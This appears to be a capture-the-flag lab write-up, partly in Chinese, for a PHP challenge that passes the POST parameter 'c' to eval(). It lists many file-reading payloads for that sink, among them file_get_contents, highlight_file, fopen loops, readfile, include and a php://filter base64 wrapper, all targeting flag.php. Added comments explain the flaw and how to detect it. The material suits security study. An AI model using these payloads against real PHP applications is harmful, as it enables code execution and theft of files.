image-20250315152839289

[!IMPORTANT]

0x01

访问靶场，页面回显如下源码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// Are you showing off? (original comment)
// Challenge source: the POST parameter `c` is passed straight to eval(),
// so anyone who can reach this endpoint runs arbitrary PHP with the web
// server's privileges. That sink is the whole challenge; there is no
// input filtering anywhere in this file.
// Defensive reading: there is no safe allow-list for PHP source handed to
// eval(), so the only real fix is removing the call. For detection, a POST
// body carrying a `c` parameter containing PHP code is the observable signal.
if(isset($_POST['c'])){
        $c= $_POST['c'];   // untrusted input, used without validation
        eval($c);          // arbitrary code execution sink
}else{
    highlight_file(__FILE__);   // without `c`, the page prints its own source
}

0x02

与 58 题雷同，此处补充一些常见的读取文件函数及 payload 替代写法

  • file():

    
    // Payload examples. Every one of these runs inside the eval() sink shown
    // above; the read function varies, but the sink is what makes any of them
    // possible, so removing eval() closes all of them at once.
    c=echo file_get_contents('flag.php');
    
    c=echo highlight_file('flag.php');
    c=highlight_file("flag.php");
    
    c=show_source('flag.php');
    
    c=
    $a=fopen("flag.php","r");
    while($b=fgets($a)){
    echo $b;
    }
    
    // file(): reads the whole file into an array, one element per line
    c=print_r(file('flag.php'));
    c=var_dump(file('flag.php'));
    
    c=readfile("flag.php");
    
    // read line by line
    c=$a=fopen("flag.php","r");while (!feof($a)) {$line = fgets($a);echo $line;}
    // read one character at a time
    c=$a=fopen("flag.php","r");while (!feof($a)) {$line = fgetc($a);echo $line;}
    // fgetcsv(): same loop, each line parsed into CSV fields
    c=$a=fopen("flag.php","r");while (!feof($a)) {$line = fgetcsv($a);var_dump($line);}
    
    1. file_get_contents()

    2. highlight_file()

    3. show_source()

    4. fgets()

    5. readfile()

    6. fopen()

    7. include " ":

      
      c=include('flag.php');echo $flag;
      
      c=include($_GET['1']); ?1=php://filter/convert.base64-encode/resource=flag.php
      
      c=include('flag.php');var_dump(get_defined_vars());
      // var_dump(): prints the variables that have been registered
      // get_defined_vars(): returns an array of all currently defined variables